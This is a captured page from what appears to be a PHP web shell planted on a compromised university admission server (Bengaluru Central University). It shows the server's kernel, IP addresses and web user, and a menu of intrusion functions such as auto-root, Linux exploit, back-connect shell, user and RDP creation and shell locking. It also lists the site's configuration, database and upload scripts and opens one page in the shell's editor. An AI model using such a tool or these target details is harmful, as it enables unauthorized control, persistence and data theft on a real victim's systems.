Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 13.58.103.70
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
bcu /
adm_old /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxrwxrwx
MainPage.html
36.34
KB
-rwxr-xr-x
MainPage_10092018.html
35.82
KB
-rwxr-xr-x
MainPage_dev.html
36.76
KB
-rwxr-xr-x
Pictures - Shortcut.lnk
782
B
-rwxr-xr-x
Uniclare1.mp4
4.93
MB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
cconfig.php
1.47
KB
-rwxr-xr-x
database.php
404
B
-rwxr-xr-x
index.html
4.82
KB
-rwxr-xr-x
index_10092018.html
4.72
KB
-rwxr-xr-x
instruction.html
5.01
KB
-rwxr-xr-x
instruction_10092018.html
8.56
KB
-rwxr-xr-x
instruction_regn.html
4.32
KB
-rwxr-xr-x
login.php
293
B
-rwxr-xr-x
sendMobEmailOTP.php
1.4
KB
-rwxr-xr-x
sendsmsapi.php
760
B
-rwxr-xr-x
sign-up.html
7.29
KB
-rwxr-xr-x
signin.php
1.02
KB
-rwxr-xr-x
signup.php
1.22
KB
-rwxr-xr-x
support.html
4.92
KB
-rwxr-xr-x
upload.php
393
B
-rwxr-xr-x
upload1.php
395
B
-rwxr-xr-x
upload_file.php
523
B
-rwxr-xr-x
validateRegno.php
1.51
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : instruction.html
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport"> <title>BCU: Bengaluru Central University</title> <!-- Favicon--> <link rel="icon" href="images/favicon.jpg" type="image/x-icon"> <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,600,700,800&subset=latin-ext" rel="stylesheet"> <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet" type="text/css"> <!-- Bootstrap Core Css --> <link href="plugins/bootstrap/css/bootstrap_adm.css" rel="stylesheet"> <!-- Waves Effect Css --> <link href="plugins/node-waves/waves.css" rel="stylesheet" /> <!-- Custom Css --> <link href="css/style_adm.css" rel="stylesheet"> <!-- AdminBSB Themes. You can choose a theme from css/themes instead of get all themes --> <link href="css/themes/all-themes.css" rel="stylesheet" /> <style type="text/css"> .feedback { background-color : #31B0D5; color: white; padding: 10px 20px; border-radius: 4px; border-color: #46b8da; } #mybutton { position: fixed; bottom: 1%; right: 10px; } </style> </head> <body class="theme-pink" onload="loadPerdata()"> <!-- Page Loader --> <div class="page-loader-wrapper"> <div class="loader"> <div class="preloader"> <div class="spinner-layer pl-red"> <div class="circle-clipper left"> <div class="circle"></div> </div> <div class="circle-clipper right"> <div class="circle"></div> </div> </div> </div> <p>Please wait...</p> </div> </div> <!-- #END# Page Loader --> <!-- Top Bar --> <nav class="navbar"> <div class="container-fluid" style="color: #fff;"> <div class='col-md-12 m-t--5'> <a href="#" class="links" onclick="homeLink()" style="float: right;margin-top: 15px; font-size:16px;color: #fff; ">Logout</a> <center> <h2 class="brand" style="margin-left: 50px;">Bengaluru Central University</h2> </center> <center> <h4 class="brand" style="margin-top: -4px;">Online Admission Entry</h4> </center> </div> </div> </nav> <section class="content"> <div class="row clearfix"> <div class="container-fluid"> <div class="col-lg-10 col-md-10 col-sm-12 col-xs-12"> <div class="card"> <div class="body bg-teal"> <table style="border-radius: 15px !important;border-collapse: unset;border: 1px solid #fff;padding: 10px;" id="studinfo" class="table no-border"> </table> <div class="row clearfix btns"> <div id="admEnt"> <a href='MainPage.html'><button type="button" class="btn btn-lg btn-default waves-effect">Admission Entry / Corrections</button></a> </div> <div> <a href='support.html'><button type="button" class="btn btn-lg btn-default waves-effect">Support</button></a> </div> <div> <a href='#'><button onclick="rePrintApplication()" type="button" class="btn btn-lg btn-default waves-effect" >Print Application Form</button></a> </div> </div> </div> </div> </div> </div> </div> <div id="mybutton"> <button class="feedback">Feedback</button> </div> </section> <script src="plugins/jquery/jquery.min.js"></script> <!-- Bootstrap Core Js --> <script src="plugins/bootstrap/js/bootstrap.js"></script> <!-- Select Plugin Js --> <script src="plugins/bootstrap-select/js/bootstrap-select.js"></script> <!-- Slimscroll Plugin Js --> <script src="plugins/jquery-slimscroll/jquery.slimscroll.js"></script> <!-- Waves Effect Plugin Js --> <script src="plugins/node-waves/waves.js"></script> <script src="js/kusPhdAdm.js?v=22" type="text/javascript"></script> <!-- Custom Js --> <script src="js/admin.js"></script> <script src="js/login.js"></script> <!-- Demo Js --> <script src="js/demo.js"></script> <script type="text/javascript"> $(function () { $(window).bind("beforeunload", function () { fnLogOut(); }) }); function fnLogOut() { alert('browser closing'); } </script> </body> </html>
Close